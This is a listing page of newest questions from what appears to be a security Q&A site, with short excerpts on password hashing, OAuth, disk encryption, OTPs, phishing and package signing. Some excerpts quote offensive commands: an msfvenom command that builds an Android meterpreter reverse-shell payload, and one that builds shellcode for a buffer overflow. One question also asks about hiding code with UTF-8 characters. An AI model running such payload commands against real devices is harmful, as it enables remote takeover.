Newest Questions

Ask Question
70,166 questions
Newest Active Bountied Unanswered
Filter by
Sorted by
Tagged with
0 votes
0 answers
4 views

is it possible to insert hidden code using utf8 that rearranges a sequence of executable ascii letters (first utf8 character that rearranges the letters off-screen could be interpreted as an ignorable ...
loud_flash's user avatar
  • 1
0 votes
0 answers
21 views

To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
DevelJoe's user avatar
  • 161
1 vote
0 answers
24 views

I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
Eray Halidov's user avatar
  • 11
0 votes
1 answer
43 views

I use msfvenom generated shellcode in buffer overflow. Here's command that i used to create shellcode for linux x64: msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami and here's ...
CyberCr0w's user avatar
  • 1
0 votes
1 answer
36 views

I have recently added CSP headers to a rather complex web application, being -report-only at first. I got some noise from browser extensions in the report, but two incidents caught my eye especially: ...
cis's user avatar
  • 417
1 vote
0 answers
30 views

I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also? I saw that it can attack during a phone update download. If the update has downloaded ...
Master Baiter's user avatar
  • 11
1 vote
0 answers
65 views

I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
Dolda2000's user avatar
  • 305
1 vote
0 answers
76 views

Until now, I have been using VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
zbroqvfuktscvn's user avatar
  • 11
0 votes
0 answers
56 views

Wikipedia's CAs are Let's Encrypt, DigiCert and GlobalSign. But my browser shows a certificate issued by... Google? (See the screenshot) What can this possibly mean? I know there are some similar ...
user avatar
0 votes
0 answers
13 views

I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global. Usually, a system-related program would go in /...
DannyNiu's user avatar
  • 402
0 votes
0 answers
24 views

I want to know how much secure is the package lm-sensors. I need to monitor the temperature of my machine to adapt the configuration of the fans. The programm prompt me for my root password to access ...
Yohan W. Dunon's user avatar
  • 101
0 votes
0 answers
22 views

i wanna your advice for cyberSecurity career i've been 3 years experience as fullstack developer and i thing i gave some love to all things realated with DevOps and linux an cyberSecurity , so i ...
php_learn's user avatar
  • 1
0 votes
0 answers
21 views

I tried to search the web on existing projects, but after failed attempts, I decided to code something on my own way, one approach, open to comments and improvements: #!/usr/bin/env python3 import ...
Gilles Quénot's user avatar
  • 101
0 votes
0 answers
32 views

This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
Towrope's user avatar
  • 101
0 votes
1 answer
87 views

I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...
In Hoc Signo's user avatar
  • 109
0 votes
0 answers
18 views

I discovered ExtAnalysis, tried to run it in a Docker container, but this seems that this project is abandoned. There's too many errors. Some issues are opened since 2023 in the repository. So my ...
Gilles Quénot's user avatar
  • 101
-1 votes
0 answers
47 views

During the change of clock due to the daylight saving time, almost all banks stop all money transactions at least from 1 hour before to 1 hour ahead of the time of change if the clock. Why do they ...
Space.yg's user avatar
  • 1
0 votes
0 answers
18 views

I am doing a security exercise where I need to use a wordfile and scan a server for endpoints to find a secret. The secret is on a file called .env (I found it in a different way), but I wonder why ...
Μenelaοs's user avatar
  • 101
0 votes
1 answer
188 views

I would like to be able to store backups on potentially "untrustworthy" sources such as cloud storage. Whilst I could probably get away with a simple encrypted tar file, for a single backup, ...
Sam Coutteau's user avatar
  • 113
5 votes
1 answer
809 views

I noticed that with Linux pam-u2f module whether you are required to input your PIN can be changed by simply editing ~/.config/Yubico/u2f_keys file and either adding +pin to your configuration line or ...
ojs's user avatar
  • 151
6 votes
1 answer
609 views

Apple claims that one time token is created. What is the purpose of that token? What happens with that token? As far as I know when I pay with my physical debit card the information passed the POS ...
ilhan's user avatar
  • 475
0 votes
1 answer
40 views

My company has a small call center. Less than 100 people. Currently we do not do any credit card transactions but are looking to do so in the future. One potential client has us using their ...
Magellan Jim's user avatar
  • 1
7 votes
3 answers
2k views

I use SMS for MFA (yes I know it's bad, but better than no MFA) in an web application. On login an OTP is sent to the user via SMS. This OTP is valid until: it expires after 10 minutes it is ...
Martin's user avatar
  • 173
0 votes
0 answers
21 views

How does Defender for Cloud interpret and normalize these logs? In the Defender console, I see an inbound connection on a DMZ host (acting as an FTP server using vShell), showing Tor IP → internal IP. ...
Sabari A's user avatar
  • 1
0 votes
1 answer
62 views

When you interact with QSCD on a token do you need the middleware to be issued by a Trusted Service Provider (TSP), or is middleware just a utility which I can reimplement on another platform? Does ...
Desperado's user avatar
  • 101
1 vote
0 answers
46 views

I have an application, myapplication.exe. Through IFEO registry I can attach a debugger, which can be a malicious piece of software for a attacker. Only someone having access to Windows registry can ...
Jyothish Bhaskaran's user avatar
  • 111
0 votes
0 answers
55 views

A user accidentally clicked a link in a phishing email. The link led to what appeared to be an online video-course/tutorial site. The user did not enter any credentials, download any files, or ...
maruf's user avatar
  • 101
0 votes
1 answer
96 views

In php I am generating a unique random token used as a code and Index for password resets: declare(strict_types=1); namespace App\Domain\Helper; use Ramsey\Uuid\Uuid; use Random\RandomException; ...
Dimitrios Desyllas's user avatar
  • 399
0 votes
0 answers
4 views

Is there any method to forensically analyse Android mobile memory without rooting the phone. I want to capture malware in my Android phone.
Reza Haider's user avatar
  • 1
0 votes
3 answers
98 views

I am using the following approach for time limited OTP used in my php app using a pseudorandom generator: $otp=str_pad((string)random_int(0, 9999), 4, '0', STR_PAD_LEFT); Then upon the User I store:...
Dimitrios Desyllas's user avatar
  • 399
0 votes
0 answers
39 views

Does the chocolatey package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them? I usually trust my OS ...
Michael Altfield's user avatar
  • 1,196
0 votes
1 answer
30 views

Does the cygwin package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them? Fortunately, it's possible to ...
Michael Altfield's user avatar
  • 1,196
3 votes
7 answers
3k views

I am making my first commercial Java program and am worried about crack prevention. I would run it on the cloud, except it needs to run on their machine at a runtime. I have an obfuscator set up, but ...
user31830467's user avatar
  • 63
0 votes
0 answers
49 views

Assuming that RAM is inside the SoC, nullifying the possibility of cold-boot attacks, the only other way to obtain the decryption key is to extract it from the secure storage in which it is saved. I ...
allexj's user avatar
  • 537
0 votes
0 answers
36 views

I have been asked to implement a new payment system that uses Google/Apple Pay's Direct integration (using Tokenized PANs (DPAN), not clear cards) as well as a similar Tokenized PAN retrieved from our ...
APagonis's user avatar
  • 1
0 votes
2 answers
171 views

Embedded and IoT systems power on autonomously, without user input (unlike PCs or phones requiring a PIN/password). If the manufacturer wants to encrypt the flash storage: Must the decryption key be ...
allexj's user avatar
  • 537
2 votes
1 answer
168 views

I have two related questions about BitLocker’s key handling: 1) After the system boots and BitLocker unlocks the drive, TPM releases the Volume Master Key (VMK) and from now on it is resident in ...
allexj's user avatar
  • 537
0 votes
1 answer
63 views

I'm trying to understand the Authorisation Code flow in OAuth and I'm confused about how CSRF would happen, specifically I don't think I'm understand how the flow actually works. Here's a diagram of ...
AS3's user avatar
  • 103
0 votes
1 answer
57 views

I'm implementing OAuth2 authorization code flow with PKCE for a public client (SPA) using Spring Authorization Server, and I've noticed that no refresh token is included by default in the token ...
ikiwq's user avatar
  • 3
1 vote
1 answer
65 views

In this old InfoSec SE question regarding IDNs (International Domain Names), the OP asks if companies should "actively seek out and register domains in alternative (similar looking) character ...
Amazon Dies In Darkness's user avatar
  • 3,204
0 votes
1 answer
46 views

I have an API Key for a service that holds sensitive data (Sick Days, Employee Home Address) that should not be exposed to other devs in my company. The API of my service will only allow a user with a ...
Andresch Serj's user avatar
  • 217
0 votes
0 answers
74 views

I'm struggling to come up with a better encryption model for this scenario: User is mobile app user Small (USA) company with small budget wants to store data encrypted at rest per user in cloud ...
dotmainframe's user avatar
  • 101
0 votes
0 answers
157 views

I came to ask this doubt here, because, it ended being more an operating system's security heuristics/cryptological question than a pure reverse-engineering one. Question is about UAC and its ...
nostromo's user avatar
  • 101
0 votes
1 answer
194 views

I have about ten copies of: avg_secure_browser_setup1.exe avg_secure_browser_setup2.exe avg_secure_browser_setup3.exe etc. This isn't the first time that I've found this. The first time I noticed ...
Zebrafish's user avatar
  • 111
0 votes
0 answers
6 views

After a fresh install of Windows 11 on a wiped disk, can you hide your Recycle Bin and never use "Delete", but instead right-click the file or folder and use Eraser software to permanently ...
Mark Donnell's user avatar
  • 11
1 vote
1 answer
86 views

If I wipe a SSD twice with Killdisk, then do a clean install of Windows 11, then do full disk encryption with Veracrypt, then clone this disk to several wiped external SSDs, can I use the same ...
Mark Donnell's user avatar
  • 11
1 vote
1 answer
69 views

PuTTY's latest master key (https://www.chiark.greenend.org.uk/~sgtatham/putty/keys.html) does not seem validated / signed by external 3rd parties. Is this a red flag? See https://pgp.mit.edu/pks/...
Kamal's user avatar
  • 113
0 votes
0 answers
74 views

I sometimes see on Opera on Android: Allow protected content https://www.politico.com/ wants to play protected content. Your device's identity may be accessed by this site. ☑ Remember choice Deny  ...
Franck Dernoncourt's user avatar
  • 819
1 vote
0 answers
47 views

My apologies if I ask a basic question, My Question: So when we design AD environments, we create Tiering models, for example, let's say Tier-0 ( Domain admins ), Tier-1 ( Workstation users ) So now, ...
deucalion's user avatar
  • 11
0 votes
1 answer
53 views

This is the scenario I'm facing: Windows 10 LTS / Windows 11 clients user with autologon and "unknown" password (the password is autorotated and stored somewhere) user has limited rights (...
Arsenal's user avatar
  • 111

15 30 50 per page
1
2 3 4 5
1404